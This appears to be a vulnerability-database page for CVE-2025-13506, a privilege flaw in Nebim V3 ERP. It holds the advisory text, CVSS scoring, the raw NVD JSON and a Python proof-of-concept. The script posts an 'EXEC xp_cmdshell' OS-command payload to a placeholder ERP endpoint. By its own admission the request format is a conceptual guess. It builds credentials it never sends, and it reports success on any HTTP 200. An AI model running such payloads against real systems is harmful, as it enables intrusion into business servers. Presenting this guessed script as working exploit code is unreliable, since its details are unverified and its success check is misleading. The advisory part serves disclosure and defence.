Security Vulnerability Report
CVE-2025-13506 CVSS 8.8 HIGH

CVE-2025-13506

Published: 2025-12-12 13:15:43
Last Modified: 2026-04-15 00:35:42

Description

Execution with Unnecessary Privileges vulnerability in Nebim Neyir Computer Industry and Services Inc. Nebim V3 ERP allows Expanding Control over the Operating System from the Database. This issue affects Nebim V3 ERP: from 2.0.59 before 3.0.1.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Nebim V3 ERP >= 2.0.59 and < 3.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13506 PoC - Nebim V3 ERP Privilege Escalation
# Target: Nebim V3 ERP Database to OS Command Execution
# Note: This is a conceptual PoC for authorized security testing only
import requests

# Placeholder values; the real endpoint and session are not known to this sketch
TARGET_URL = "http://target-server:port/NebimV3/"
SESSION_COOKIE = "your_session_cookie"


def exploit_cve_2025_13506():
    """
    Demonstrates privilege escalation via database to OS control
    Requires low-privilege database user credentials
    """
    print("[*] CVE-2025-13506 - Nebim V3 ERP Privilege Escalation")

    # Step 1: Authenticate with low-privilege account
    # (built here but never sent: the sketch relies on SESSION_COOKIE instead)
    auth_payload = {
        "username": "low_priv_user",
        "password": "password123"
    }

    # Step 2: Exploit database privilege escalation
    # Note: Actual exploitation requires understanding of Nebim V3 ERP internals
    exploit_payload = {
        "module": "DatabaseCommand",
        "action": "Execute",
        "query": "EXEC xp_cmdshell 'whoami'"
    }
    print("[+] Sending exploit payload...")

    # Step 3: Verify OS command execution
    response = requests.post(
        TARGET_URL,
        json=exploit_payload,
        cookies={"session": SESSION_COOKIE}
    )
    if response.status_code == 200:
        print("[+] Exploitation successful - OS command executed")
        print(f"[+] Response: {response.text}")
    else:
        print("[-] Exploitation failed")


if __name__ == "__main__":
    print("[!] For authorized security testing only")
    exploit_cve_2025_13506()
```

References

Weakness: CWE-250 (Execution with Unnecessary Privileges)
https://www.usom.gov.tr/bildirim/tr-25-0450

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13506",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-12T13:15:43.240",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Execution with Unnecessary Privileges vulnerability in Nebim Neyir Computer Industry and Services Inc. Nebim V3 ERP allows Expanding Control over the Operating System from the Database.This issue affects Nebim V3 ERP: from 2.0.59 before 3.0.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-250"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.usom.gov.tr/bildirim/tr-25-0450",
        "source": "[email protected]"
      }
    ]
  }
}
```